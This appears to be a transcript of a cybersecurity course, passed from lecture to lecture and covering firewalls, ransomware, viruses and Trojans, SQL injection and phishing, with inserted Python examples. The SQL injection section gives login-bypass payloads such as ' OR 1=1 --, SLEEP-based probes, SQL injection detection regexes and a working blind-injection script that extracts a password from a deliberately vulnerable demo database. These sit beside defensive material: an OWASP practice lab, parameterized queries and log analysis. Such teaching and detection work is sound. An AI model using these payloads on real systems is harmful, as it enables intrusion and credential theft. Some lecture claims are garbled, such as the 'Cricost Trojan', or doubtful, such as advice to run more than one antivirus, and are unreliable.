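            (self.src_port, p.src_port), (self.dst_port, p.dst_port),
        )
        return all(want == "*" or want == have for want, have in checks)


class PacketFilter:
    """Stateless packet filter: every packet is judged against the rules alone."""

    def __init__(self, rules):
        self.rules = list(rules)

    def decide(self, p: Packet) -> str:
        for rule in self.rules:  # first match wins, default deny
            if rule.matches(p):
                return rule.action
        return "deny"


class StatefulFirewall(PacketFilter):
    """Stateful (dynamic packet filtering) firewall: rules decide only whether a
    NEW connection may start; later packets are admitted only if they belong
    to a connection recorded in the state table."""

    def __init__(self, rules):
        super().__init__(rules)
        self.state = set()  # entries: (client_ip, client_port, server_ip, server_port, proto)

    def decide(self, p: Packet) -> str:
        forward = (p.src_ip, p.src_port, p.dst_ip, p.dst_port, p.proto)
        reply = (p.dst_ip, p.dst_port, p.src_ip, p.src_port, p.proto)
        if forward in self.state or reply in self.state:
            return "allow"  # part of an established connection
        if p.proto == "tcp" and p.syn and not p.ack:
            action = super().decide(p)  # new connection: consult the rule set
            if action == "allow":
                self.state.add(forward)
            return action
        return "deny"  # mid-stream packet with no matching state is unsolicited


def run_scenario():
    """Constructed traffic: workstation 10.0.0.5 opens an HTTPS connection."""
    workstation, web_server, stranger = "10.0.0.5", "203.0.113.10", "198.51.100.7"
    # Stateless rule set: to let the HTTPS reply back in it must admit every
    # inbound packet whose source port is 443, a value a sender picks freely.
    stateless = PacketFilter([
        Rule("allow", src_ip=workstation, proto="tcp", dst_port=443),
        Rule("allow", dst_ip=workstation, proto="tcp", src_port=443),
    ])
    # Stateful rule set: only the outbound rule; replies follow the state table.
    stateful = StatefulFirewall([
        Rule("allow", src_ip=workstation, proto="tcp", dst_port=443),
    ])
    traffic = {
        "syn_out": Packet(workstation, web_server, "tcp", 51000, 443, syn=True),
        "synack_reply": Packet(web_server, workstation, "tcp", 443, 51000, syn=True, ack=True),
        "spoofed_inbound": Packet(stranger, workstation, "tcp", 443, 51000, ack=True),
    }
    return {name: {"stateless": stateless.decide(p), "stateful": stateful.decide(p)}
            for name, p in traffic.items()}


if __name__ == "__main__":
    for name, verdict in run_scenario().items():
        print(f"{name:16} stateless={verdict['stateless']:5} stateful={verdict['stateful']}")
```

The stateless filter has to open inbound traffic from source port 443 to let the reply in, and that rule also admits the spoofed packet; the stateful firewall needs only the outbound rule and denies the spoofed packet because no matching connection exists. A stateful inspection firewall, then, checks whether or not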
that network packet is part of an established network connection. Such firewalls are also referred to as dynamic packet filtering firewalls. Our next type of firewall is called a proxy firewall. This draws a close comparison to how you give proxy attendance for a friend: just as you take the authority to represent your friend, the proxy firewall pretends to be you and interacts with the internet. It comes between you and the internet and thereby prevents direct connections. This protects your device's identity and keeps the network safe from potential attacks; only if the contents of the incoming data packet are safe does the proxy firewall transfer it to you. They are also known as application-level gateways. The firewall can spot malicious actions and block your computer from receiving data packets from harmful sources. In addition to preventing cyber attacks, firewalls are also used in educational institutions and offices to restrict users' access to certain websites or applications; that is, to prevent access to unauthorized content.

It's the year 2015, and Richard has just finished playing games on his computer. After a long gaming session, Richard tries to shut it down but finds a random text file on the desktop that says "ransom note". The text file explains how a hacking group had encrypted Richard's game files and private documents and that he had to pay a ransom of $500 worth of Bitcoin to a specified Bitcoin address. Richard quickly checked his files, only to find them encrypted and unreadable. This is the story of how the TeslaCrypt ransomware spread in 2015, affecting thousands of gamers before the master key used for encrypting the files was released.

So what is ransomware? For Richard to be targeted by such an attack, he must have installed applications from untrusted sources or clicked an unverified link; both can function as gateways for a ransomware breach. Ransomware is a type of malware that encrypts personal information and documents while demanding a ransom amount to decrypt them. This ransom payment is mainly done using cryptocurrency to ensure anonymity, but it can also employ other routes. Once the files are encrypted or locked behind a password, a text file is presented to the victim explaining how to make the ransom payment and unlock the files, just as Richard found the ransom note text file on his desktop. Even after the money has been paid, there is no guarantee that the hackers will send the decryption key or unlock the files, but in certain sensitive situations victims make the payment hoping for the best. Having never encountered ransomware attacks before, this gave Richard an opportunity to learn more, and he began his research on the topic.

The spread of ransomware mostly starts with phishing attacks (to know more about phishing attacks, click the link in the button above). Users tend to click on unknown links received via emails and chat applications promising rewards of some nature; once clicked, the ransomware files are installed on the system, encrypting all the files or blocking access to computer functions. Ransomware can also be spread via malware transmitted through untrusted application installations or even a compromised wireless network. Another way to breach a system with ransomware is by using Remote Desktop Protocol, or RDP, access: a computer can be accessed remotely using this protocol, allowing a hacker to install malicious software on the system with the owner unaware of these developments.

Coming to the different types of ransomware, first we have locker ransomware, which is a type of malware that blocks standard computer functions from being accessed until the payment to the hackers is complete; it shows a lock screen that doesn't allow the victim to use the computer even for basic purposes. Another type is crypto ransomware, which encrypts the local files and documents on the computer; once the files are encrypted, finding the decryption key is impossible unless the ransomware variant is old and the keys are already available on the internet. Scareware is fake software that claims to have detected a virus or other issue on your computer and directs you to pay to resolve the problem; some types of scareware lock the computer, while others simply flood the screen with pop-up alerts without actually damaging files.

To avoid being affected by ransomware, Richard could have followed a few steps to further enhance his security. One must always have backups of their data; cloud storage for backup is easy, but a physical backup on a hard drive is always recommended. Keeping the system updated with the latest security patches is always a good idea. Apart from system updates, one must always have reputed antivirus software installed; many antivirus products like Kaspersky and Bitdefender have anti-ransomware features that periodically check for encryption of private documents. When browsing the internet, a user must always check for the lock symbol in the address bar, which signifies the presence of the HTTPS protocol, for additional security. If a system is already infected with ransomware, there is a website, nomoreransom.org, which has a collection of decryption tools for most well-known ransomware packages; it can also help decrypt specific encrypted files if the list of anti-ransomware tools didn't help the victim.

Malware is malicious software that is programmed to cause damage to a computer system, network, and hardware devices. Many malicious programs like Trojans, viruses, logic bombs, and bots which cause damage to the system are known as malware. Most malware programs are designed to steal information from the targeted user or to steal money from the target by stealing sensitive data. Let's take a look at the introduction to two different types of malware: the virus and the Trojan. Firstly, let's take a look at what exactly a virus program is. A computer virus is a type of malicious program that replicates itself on execution. Viruses attach themselves to different files and programs, which are termed host programs,
by inserting their code. If the attachment succeeds, the targeted program is termed infected with a computer virus. Now let's take a look at the Trojan horse. A Trojan horse program is a program that disguises itself as a legitimate program but harms the system on installation. They hide within attachments and emails and then transfer from one system to another. They create back doors into our system to allow the cyber criminal to steal our information.

Let's take a look at how they function after getting installed on our system. Firstly, we have virus programs. A computer virus must contain two parts to infect the system: the first is a search routine, which locates new files and data to be infected by the virus program, and the second part is known as the copy routine, which is necessary for the program to copy itself into the targeted file located by the search routine. Now let's take a look at how the Trojan horse functions. For Trojan horses, the entryway into our system is through emails that may look legitimate but have unknown attachments; when such files are downloaded onto the device, the Trojan program gets installed and infects the system. They also infect the system on the execution of an infected application or executable file and attack the system.

Now that we understand what viruses and Trojans are, let's understand the different types of viruses and Trojans. Let's take a look at the different types of viruses. The first one is known as the boot sector virus. This type of virus damages the booting section of the system by infecting the master boot record, also known as the MBR; it damages the boot sector by targeting the hard disk of the system. Then we have the macro virus. A macro virus is a type of virus that gets embedded into document-related data and is executed when the file is opened; they are also designed to replicate themselves and infect the system on a larger scale. And lastly we have the direct action virus. This type of virus gets attached to executable files which, on execution, activate the virus program and infect the system; once the infection of the file is completed, they exit the system, which is also the reason it is known as a non-resident virus.

Let's take a look at the different types of Trojans. The first type is the backdoor Trojan. They are designed to create a backdoor in the system on execution of an infected program; they provide remote access to the system to the hacker, and this way the cyber criminal can steal our system data and may use it for illegal activities. Next we have the Cricost Trojan. These enter the system when we click the random pop-ups we come across on the internet; they tempt the user into giving personal details for different transactions or schemes, which may provide the cyber criminal remote access to the system. And the last Trojan type is the ransom Trojan. This type of Trojan program, after entering the system, blocks the user from accessing their own system and also affects system function; the cyber criminal demands a ransom from the targeted user for the removal of the Trojan program from the device.

Now that we understand some details regarding viruses and Trojans, let's solve a question. The question is: Jake was denied access to his system, and he wasn't able to control the data and information in his system. What could be the reason behind his system's problem? Option A: macro virus. Option B: ransom Trojan. Option C: backdoor Trojan. Give your answers in the comment section.

Now let's understand how to detect the activity of viruses and Trojans in our system. To detect virus or Trojan activity in a system we can refer to the following points. For viruses: slowing down of the system and frequent application freezes show that a virus infection is present in the system; viruses can also steal sensitive data, including passwords and account details, which may lead to unexpected logouts from accounts or corruption of sensitive data; and lastly, frequent system crashes due to a virus infection that damages the operating system. For Trojans: frequent system crashes and slow reaction time; more random pop-ups from the system, which may indicate Trojan activity; and lastly, modification of system applications and changes to the desktop appearance, which can also be due to infection by a Trojan program.

Next, let's take a look at a famous cyber attack for a virus and for a Trojan horse. For the virus we have the MyDoom virus, identified in the year 2004, which affected over 50 million systems by creating a network for sending spam emails that was used to gain backdoor access into systems. For the Trojan horse we have the Emotet Trojan program, which is specifically designed for financial theft and for stealing bank-related information.

Next we have a few points on how to prevent virus entry or a Trojan attack on a system. The most basic way of virus protection is using antivirus and doing regular virus scans; this will prevent virus entry into the system, and having more than one antivirus provides much better protection. Then, avoiding uncertified websites can also prevent virus entry into our system. Then we have regular driver updates and system updates to prevent virus entry. For Trojans, we have using certified software from legal sites to prevent any Trojan activity in our system, and also avoiding clicking random pop-ups that we often see on the internet; and lastly, using antivirus and firewalls for protection against Trojan horses is a good habit.

Now that we have reached the end of the video, let's take a look at what we learned. For the first part, we saw that the main objective of a virus is to harm the data and information in a system, whereas for the Trojan it is stealing data, files, and information; the effect of viruses is more drastic in comparison to Trojan horses. Then we have that viruses are non-remote programs, whereas Trojan
horses are remotely accessed; and lastly, viruses have the ability to replicate themselves to harm multiple files, whereas Trojans do not have the replication ability.

So let's begin with what SQL injection is. As the name suggests, a SQL injection vulnerability allows an attacker to inject malicious input into a SQL statement. SQL stands for Structured Query Language, which is the language used by an application to interact with a database. Normally this attack is targeted towards a database to extract the data that is stored within; however, the vulnerability does not lie in the database itself. The vulnerability will always lie in the application. It is the developer's responsibility to decide how to develop the application and how to configure it to prevent SQL injection queries from happening. A database is created to answer questions, and if a question is asked, it is supposed to answer it. The database needs to be configured with some amount of security, but the flaw behind SQL injection will always lie in the application itself: it is how the application interacts with the database that needs to be modified and maintained by the developer, rather than just configuring the database itself. So the attacker, when they send a query to the application, will form a malformed query by injecting a particular command or operator that is recognized by the SQL language, and if that operator is passed through the application to the database, then the database basically gets cracked or does a data dump because of that unwanted character coming in. So this character needs to be filtered at the application level itself.

Now let's look at a quick demo. What I have here is a virtual machine called OWASP Broken Web Applications, version 1.2. I'm going to power this on, and while it powers on I'm going to show you where we can download this utility from. You can just search for "OWASP broken web application project download" and you'll find it on sourceforge.net. Click on the link and you can download the Broken Web Application project from here; this is a 1.9 GB download, and you get a zipped machine directly for VMware or Oracle VirtualBox. Now, this is an application that has been developed by OWASP, which stands for Open Web Application Security Project, a not-for-profit organization that periodically releases the top 10 risks that an application will face for that particular year. So they have given a web application with built-in vulnerabilities for professionals like us to practice upon, to develop our skills upon, because doing this in the real world is illegal. I cannot go onto a website to demonstrate how a SQL injection attack works, and neither should you try your hand at it until you become very well rehearsed with it. So, to upgrade your skills, to upskill yourself, please download this machine, host it in VMware Workstation or Oracle VirtualBox, and you can then try your skills on it.

Just going back to the browser here, if I open up a new tab you'll see that this machine has booted up and has an IP address ending in 71.132. So if I go to that IP address and type in 192.168.71.132, you'll see the OWASP Broken Web Application project, and there are a lot of training applications, realistic intentionally vulnerable applications, old versions of real applications, and so on and so forth. So there are a lot of applications built in here that you can try your skills upon. We are going to use the OWASP utility over here; this gives you the OWASP Top 10 risks for 2010, 2013, and 2017, which is the latest one so far. The difference between 2013 and 2017 is that some of these have changed, but not all of them; the order has changed a little bit, but you can see that SQL injection is at the top, A1, amongst the injection attacks. And you can see there are multiple types that have been given here: SQL injection for extracting data, SQL injection for bypassing authentication, SQL injection for insert attacks, blind SQL injection, and then there is a tool called SQLMap which is available freely on your Linux machines, Kali Linux or Parrot Linux, whichever you want to use for your practice targets, and so on.

So if I just take you here to bypass authentication, this is a regular login page that an application may have: you look at a username, you look at a password, you type that in and you log in. So let's say I don't know a password here. I'm just going to type in a username "test" and password "ps", I try to log in, and it shows me that the account does not exist. So the authentication mechanism does work: I did type in a username and password, and it wasn't recognized, with "account does not exist". Now let's try to type in a SQL query here. I'm going to give it a single quote, which is an operator recognized by the SQL language and which, when the database tries to execute it, will cause the database to dump some data or, in this case, to bypass authentication. And I'm going to give it a condition: single quote, OR 1=1, space, hyphen hyphen, space, and I'm going to click on login. Right now I'm not logged in at all; we tried our username and password and we weren't able to log in. So now if I log in, you will see that it gave me a status update saying the user has been authenticated and I'm logged in as admin, "got root". So that is what these SQL queries can achieve. I'm going to log out right now, and we're going to look at the basics of SQL injection.

Looking at that small demo, let's now look at what types of SQL injection are available. The first is in-band SQL injection; there are two subtypes within in-band, the error-based injection attack and the union-based injection attack. The second type is the blind SQL injection attack, where there is a boolean-based and a time-based attack. And the third one is the out-of-band SQL injection attack. Now what is an in-band SQL injection attack? In-band is where we are attempting either the
error-based or the union-based approach. What is error-based? We send a query to the database, we craft a query to the database, and it generates an error message and dumps the error message right in front of us on the screen. That makes us realize that there is a flaw, and there is some information dumped on the screen which we can then further utilize to craft our further queries as we go ahead. Union-based, on the other hand, is where we combine multiple statements at the same time. So if you look at the URL earlier, you would see a large structure in that URL; we can try to add two or more statements within the URL itself to combine them and then confuse the database into executing both statements together and giving a data dump at the same time.

So what would an error-based SQL injection look like? If I go back to the same database, which is here, and if you remember, for the username we gave it single quote OR 1=1 space hyphen hyphen space; we gave it the condition. So basically what it did was: the single quote is an operator that goes to the database, selects the default user table in this database, and then compares it to the condition that is given. The condition that we gave was 1 equals 1, which is always true. So what it did was it selected the default user table that was available in the database and, instead of comparing it to a password, it compared it to the condition. So if I give it 1 equals 2, where the condition is false, and I log in, you will see that "account doesn't exist" comes back again, because the condition was false, and instead of comparing the user account to the password it compared the user account to the condition. So if I give it single quote OR 1=1 hyphen hyphen space and log in, you can see that this is a true condition and thus we are able to log in.

Now, before we even go to that extent, if I just forget the condition over here and I just give it a single quote, the operator, and I send this operator to the database and click on login, you will see that it generates an error right on top, and it tells us the line and the file where the error happened: you can see it happened in the MySQL handler PHP file. And then it gave us the message: you have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use. Now, why would a hacker want to do this in the first place? Because there are different types of databases: there is MySQL, MSSQL or Microsoft SQL, Oracle SQL, IBM DB2; all of these are variations of the SQL database. They use the SQL language; however, every database has its own commands, its own syntax, its own specific commands that are utilized for that database. So in this scenario the hacker wants to identify what database is currently being used so they can craft those particular queries. Now, with this injection, with just me sending the quote and the error getting generated, I come to know that we are using a MySQL server, that the version of that server is 5.1.73, and the rest of the information about where the handlers are located and so on. This gives the hacker information on how they want to proceed next, what kind of queries they want to create, what kind of syntax they want to utilize. So an error-based attack is where you generate these kinds of errors and get this information. Union-based is where you craft your queries within the URL, or you can try to combine multiple statements within the input fields, and try to generate a response from that.

Then we come to boolean-based SQL injection. This sends a SQL query to the database which forces the application to return a different result depending on whether the query returns a true or a false result. So basically, if both inputs are false, the output would be false; if one input is false and the other input, input B, is true, the output would be true, and so on. So depending on the result from the inputs, the attacker will come to know which input is true, and with this he can then access the database of the website. You are trying to figure out, by sending out multiple inputs and then analyzing the output, which command exactly worked and what the resultant output of that command was; from this kind of information the hacker can infer their next step forward.

Then you have time-based SQL injections. Now, there are times when a database administrator or an application administrator has done some security configuration and thus has disabled verbose error messages. What is a verbose error message? The error message that we saw right here is a verbose error message: it gives out details about what the database is, the version, and whatnot. So if they have sanitized these errors and you can no longer generate them, and thus you cannot figure out what the database is, then what do you do? For example, if I just take you to Simplilearn and to a URL that is supposedly not accessible, you can see that it gives a generic error, "Oops, it looks like you have crash landed on Mars"; it doesn't give you the verbose error that we saw here. This one gives us a detailed error of what went wrong and where; it gives us the database, the version of the database, where the query went wrong, etc., whereas on this side there is a lot of security that goes in, so you can see it doesn't generate an error; you just get a generic page in front of you. So in that case what does a hacker do? The hacker injects a time-based query in the URL, which allows us to verify whether the command is being executed or not. We put in a time wait, let's say 10 seconds of wait, so the moment we inject the query, if the query is delayed for
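10 seconds before the response arrives, the injected delay ran inside the database, which confirms the injection point even though no error text was shown.

From the defender's side, the same signals (a quote followed by a server error, OR 1=1 conditions, UNION SELECT, and SLEEP-style delays paired with unusually slow responses) can be picked out of web server logs. The following is an added example and not part of the original lecture: a Python log analyzer that parses constructed access-log lines (combined format with a trailing response-time field in milliseconds, an assumed layout), URL-decodes each query parameter, and tags the SQL injection patterns the lecture describes. The sample lines, IP addresses, and thresholds are constructed for the demonstration.

```python
"""Spotting SQL injection probing in web server access logs (added example)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Assumed log layout: combined format plus a trailing response time in ms.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ (?P<ms>\d+)$'
)

# Patterns for the injection classes covered in the lecture, applied to the
# URL-decoded value of each query parameter.
SIGNATURES = [
    ("boolean", re.compile(r"(?i)\b(?:or|and)\s+\d+\s*=\s*\d+")),
    ("union", re.compile(r"(?i)\bunion\b.*\bselect\b")),
    ("time-based", re.compile(r"(?i)\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b")),
    ("comment-terminator", re.compile(r"--\s|/\*")),
]
SLOW_MS = 5000  # constructed threshold for "the delay really executed"


def parse_line(line: str):
    """Return the log fields as a dict, or None for lines in another format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_value(value: str, status: str) -> list:
    """Tags for one decoded parameter value; an empty list means nothing suspicious."""
    tags = [name for name, rx in SIGNATURES if rx.search(value)]
    # A bare quote that produced a server error is the error-based probe from the demo.
    if "'" in value and status == "500":
        tags.append("error-probe")
    return tags


def analyze(lines):
    """One finding per (request, parameter) whose decoded value matches a signature."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        query = urlsplit(entry["target"]).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            tags = classify_value(value, entry["status"])
            if tags:
                findings.append({
                    "ip": entry["ip"], "time": entry["ts"], "param": param,
                    "value": value, "status": entry["status"], "tags": tags,
                    "slow": int(entry["ms"]) >= SLOW_MS,
                })
    return findings


# Constructed sample log (documentation IP ranges, invented timestamps).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:15:01 +0000] "GET /login.php?username=alice&password=s3cret HTTP/1.1" 200 512 35
198.51.100.7 - - [12/Mar/2024:10:15:09 +0000] "GET /login.php?username=%27+OR+1%3D1+--+&password=x HTTP/1.1" 200 488 40
198.51.100.7 - - [12/Mar/2024:10:15:22 +0000] "GET /login.php?username=%27&password=x HTTP/1.1" 500 301 38
198.51.100.7 - - [12/Mar/2024:10:15:40 +0000] "GET /products.php?id=1+UNION+SELECT+1%2C2 HTTP/1.1" 200 2048 41
198.51.100.7 - - [12/Mar/2024:10:16:05 +0000] "GET /products.php?id=1+AND+SLEEP%2810%29 HTTP/1.1" 200 301 10042
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG.splitlines()):
        print(f["ip"], f["param"], repr(f["value"]), f["tags"], "slow" if f["slow"] else "")
```

It is deliberately signature-based, so it catches probing of the kind shown in the demo rather than every possible injection; a lone quote is flagged only when the server answered with a 500, which is the error-based case, and a SLEEP payload is marked `slow` only when the response time confirms the delay executed. Returning to the narrator's test: the moment we inject the query, if the query is delayed for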
10 seconds and then gets executed that means that the SQL injection is possible however if we inject the query and uh it just gets executed without the delay that means that the time uh injection attack would not be uh possible on that particular site out of bound is not a very common attack it depends on the features being enabled on the database management system that is being used by the web application so this can be a somewhat of a misconfiguration error uh by the database administrator where you have enabled functions and not sanitized them so you have not done in uh access controls properly you have not given account control so queries should never be executed at an administrative level they should always be uh executed at a user level with minimum privileges that are required for that query to be executed now if you’re allowing these kind of functions to be uh to be enabled at the DBMS and there is an administrative account that can have access to them at that point in time an out ofbound injection attack is possible so let’s look at how a website works right uh how SQL works on a website now the website is constructed of HTML hypertext markup language uh which would include JavaScripting for functionality cascading stylesheets for the mapping of the website right and then ReactJS and whatnot uh for further functionality now when we send a query to the website it is normally using the HTTP protocol or HTTPS protocol when the query reaches the application the application would then go ahead and generate the SQL query uh at the client side you’ll have uh all these scripting languages coming in uh on the front end uh that we can utilize to craft queries and then send them across at the server side you’ll have uh databases like Oracle MySQL MSQL and so on so forth that will then execute those queries right so just to give you an example if I use a tool called Postman what we generally do uh when we craft a query is we send out a uh get request to the website 
and then we receive a response from the site uh with the HTML code and everything so this is a tool that is utilized by software testers to test the responses that you’re going to get from various websites so on the left hand side you can see I’ve used it on quite a bit uh here we have a example for gmail.com so let’s continue with that so this is a get request being sent to gmail the moment I send it it’s going to create an HTTP request and send it across the response that I get is this this is the HTML code for gmail.com right these are the cookies uh these are the headers uh that include information so you can see this is a text HTML character set utilized is UTF8 and the configuration uh that has been done with the application right so this is where uh everything comes in this is the cookie that has been sent with that particular uh request that I had sent out now if you analyze this query right so when we went onto this application and I typed in that single quote and we generated this error right uh you can see that the application converted this into a SQL query so the query was select username from accounts where the username in quotes single quotes and we use the quote right the single quote right there so uh that’s where we use that operator and that’s where the exception error occurred so these are the kind of queries that are structured by the application and then taken on to the database for execution when we type in uh it is a HTTP get request with the username and password within that query uh that is sent to the application the application converts it into a SQL query sends it to the database and the database responds with the appropriate response so how do we prevent SQL injection in the first place use prepared statements and parameterized queries uh these statements make sure that the parameters passed into SQL statements are treated in a safe manner so for example we saw that the single quote was an operator this shouldn’t be allowed to be 
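To make the blind inference and the prepared-statement defense concrete, here is an added example (not code from the lecture or from any product it mentions). It builds a deliberately vulnerable login check that concatenates user input into SQL, a parameterized version of the same check, and an attacker routine that recovers a password one character at a time from nothing but the true/false answers, which is boolean-based blind injection. The accounts table, its rows and the function names are constructed for the demonstration; sqlite3 stands in for the MySQL/MSSQL backend of a real site.

```python
"""Boolean-based blind SQL injection against a deliberately vulnerable login
check, and the parameterized query that closes it.

This is an added example, not code from the original lecture. The accounts
table, its two rows and the login_vulnerable / login_safe functions are
constructed for the demonstration; sqlite3 stands in for the MySQL/MSSQL
backend of a real site (sqlite has no SLEEP(), so the time-based variant is
only described in the comments).
"""
import sqlite3

# Constructed in-memory database with sample rows.
conn = sqlite3.connect(":memory:", check_same_thread=False)
conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
conn.execute("INSERT INTO accounts VALUES ('admin', 's3cretP@ss'), ('bob', 'hunter2')")
conn.commit()


def login_vulnerable(username: str, password: str) -> bool:
    """Builds the SQL by string concatenation, the pattern behind the
    single-quote error shown earlier. A blind endpoint like this one returns
    only True/False and never the verbose error text."""
    sql = ("SELECT username FROM accounts WHERE username = '" + username
           + "' AND password = '" + password + "'")
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:        # syntax errors are swallowed: nothing leaks
        return False


def login_safe(username: str, password: str) -> bool:
    """Parameterized query: the values travel separately from the SQL text,
    so a quote in user input is data, never an operator."""
    sql = "SELECT username FROM accounts WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def extract_password(login, target_user: str, max_len: int = 32) -> str:
    """Recover target_user's password one character at a time using nothing
    but the true/false answer of `login`: each probe asks 'is character N
    of the password equal to C?'. A time-based attack works the same way,
    except the condition is wrapped in IF(<cond>, SLEEP(10), 0) on MySQL and
    the attacker measures the response time instead of the result."""
    charset = ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
               "0123456789@#$!_")
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in charset:
            # Injected through the username field; the trailing '--' turns the
            # real password check into a comment.
            payload = f"{target_user}' AND substr(password,{pos},1)='{ch}'--"
            if login(payload, "irrelevant"):
                found = ch
                break
        if found is None:        # no character matched: end of the string
            break
        recovered += found
    return recovered


if __name__ == "__main__":
    print("bypass via vulnerable login:", login_vulnerable("admin'--", "x"))
    print("same input via safe login:  ", login_safe("admin'--", "x"))
    print("blind extraction (vulnerable):", extract_password(login_vulnerable, "admin"))
    print("blind extraction (safe):      ", repr(extract_password(login_safe, "admin")))
```

Against `login_vulnerable` the extraction needs at most one request per character per position and never sees an error message, which is exactly why removing verbose errors alone does not stop the attack; against `login_safe` every probe answers false and nothing is recovered. Note that sqlite compares strings case-sensitively; on a MySQL column with a case-insensitive collation the attacker would have to add a BINARY cast to tell 'p' from 'P'.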
Here is a secure way of running a SQL query in JDBC using a parameterized statement. First we define which user we want to find, so there's a string the email comes in; then the connection to the database, where we figure out how the connection is created and passed; then we construct the SQL statement we want to run, specifying the parameter. So we define how it is going to be created, what is going to be created, what can be passed to the database and what should not be passed to the database. That is one way of using prepared statements and parameterized queries.

Then we have object relational mapping. Most development teams prefer to use object relational mapping (ORM) frameworks to make the translation of SQL result sets into code objects more seamless. This is an example of object relational mapping, where we map certain objects and allow that to be executed.

Then there is escaping inputs, a simple way to protect against most SQL injection attacks; many languages have standard functions to achieve this. You need to be very careful while using escape characters in your codebase when a SQL statement is constructed, and not all injection attacks rely on abuse of quote characters. You need to know which characters are being used in the configuration, structure and code you have created, which characters are recognized as operators, and you need to sanitize those operators and ensure they cannot be accepted as user input; if they are, they are weeded out by the application and never reach the database.

Other methods of preventing SQL injection are password hashing, so that passwords cannot be bypassed, recovered or cracked, and third-party authentication, where you use OAuth or some other service for a single sign-on mechanism. That way you rely on a third party to maintain the security of authentication and of the parameters that are passed, for example using LinkedIn login or Facebook login. For the layman: if you start playing a game, you are allowed to log into the game using your Facebook or Google credentials. That is not just for ease of use; the game developer has outsourced the authentication mechanism to third parties such as Facebook or Google because they understand that this authentication mechanism is as safe as can be. Facebook and Google are wealthy organizations that hire a lot of security experts, and the development of their authentication mechanisms is top-notch; a small organization cannot spend that kind of money on security itself, so you use a third-party authentication mechanism to ensure that these kinds of attacks don't happen.

Then web application firewalls. Having a web application firewall and configuring it properly for SQL injection attacks is one of the surest methods of mitigating or minimizing the threat. At this point you have realized that the application has some SQL injection vulnerabilities, and instead of recoding or restructuring the application you want to take the easier, cheaper way out, so you install a web application firewall and configure it to identify malicious queries and stop them at the firewall level, so they never reach the application and the application's vulnerabilities don't get exercised.

Buy better software and keep updating it. It is not the case that once you have installed a piece of software it is going to be safe for life: new vulnerabilities are discovered every day, every hour, and what is secure today may be completely insecure tomorrow or the day after. So you need to keep upgrading the software, and if no upgrades are available and the vulnerability still exists, you might want to migrate to better software and thus ensure you don't get hacked. Always update and use patches: organizations keep sending out updates and patches as they are released, and you need to install them to enhance your security posture. And continuously monitor SQL statements and databases: use protocol monitors, use different tools, use the firewalls to keep monitoring what kind of queries you are getting, and based on those queries ensure the inputs and the queries being created are not detrimental to the health of the software you have.

Jane is relaxing at home when she receives an email from a bank that asks her to update her credit card PIN in the next 24 hours as a security measure. Judging by the severity of the message, Jane follows the link provided in the email. On entering her current credit card PIN and the supposedly updated one, the website becomes unresponsive, which prompts her to try again some time later. However, after a couple of hours she notices a significant purchase from a random website on that same credit card, which she never authorized. Frantically contacting the bank, Jane realizes the original email was a counterfeit, a fake message with a malicious link that led to credit card fraud. This is a classic example of a phishing attack.

Phishing attacks are a type of social engineering where a fraudulent message is sent to a target on the premise of arriving from a trusted source. Its basic purpose is to trick the victim into revealing sensitive information like passwords and payment information. It's based on the word fishing, which works on the concept of bait: if the supposed victim takes the bait, the attack can go ahead, which in our case makes Jane the fish and the phishing email the bait. If Jane had never opened the malicious link, or had been cautious about the email's authenticity, an attack of this nature would have been relatively ineffective.
But how does the hacker gain access to these credentials? A phishing attack starts with a fraudulent message, which can be transmitted via email or chat applications; even using SMS conversations to impersonate legitimate sources is known as smishing, a specific category of phishing attack. Irrespective of the manner of transmission, the message targets the victim in a way that coaxes them into opening a malicious link and providing critical information on the requisite website. More often than not the websites are designed to look as authentic as possible. Once the victim submits information using the link, be it a password or credit card details, the data is sent to the hacker who designed the email and the fake website, giving him complete control over the account whose password was just provided. Often carried out in campaigns where an identical phishing mail is sent to thousands of users, the rate of success is relatively low but never zero. Between 2013 and 2015, corporate giants like Facebook and Google were tricked out of around $100 million by an extensive phishing campaign in which a known common associate was impersonated by the hackers. Apart from credential theft, some of these campaigns target the victim's device and install malware when the malicious links are clicked, which can later function as part of a botnet or as a target for ransomware attacks.

There is no single formula, for there are multiple categories of phishing attack. The issue with Jane, where the hacker stole her bank credentials, falls under the umbrella of deceptive phishing: a general email is sent out to thousands of users in this category, hoping some of them fall prey to the scam. Spear phishing, on the other hand, is a more customized version; the targets are researched before being sent an email. For example, if you never had a Netflix subscription, sending you an email that seems to come from the Netflix team becomes pointless; this is a potential drawback of deceptive phishing techniques. On the other hand, a simple screenshot of a Spotify playlist shared on social media indicates a probable point of entry: the hacker can send counterfeit messages to the target user while implying the source of those messages is Spotify, tricking them into sharing private information. Since the hacker already knows the target uses Spotify, the chances of the victim taking the bait increase substantially. For more important targets like CEOs and people with a fortune behind them, the research done is tenfold, which can be called a case of whaling; the hackers prepare and wait for the right moment to launch their phishing attack, often to steal industry secrets for rival companies or sell them off at a higher price.

Apart from emails, pharming focuses on fake websites that resemble their original counterparts as closely as possible. A prevalent method is to use domain names like Facebook with a single O or YouTube with no E; these are mistakes people make when typing the full URL in the browser, leading them straight to a counterfeit web page which can fool them into submitting private data. A few more complex methods exist to drive people onto fake websites, like ARP spoofing and DNS cache poisoning, but they are rarely carried out due to time and resource constraints.

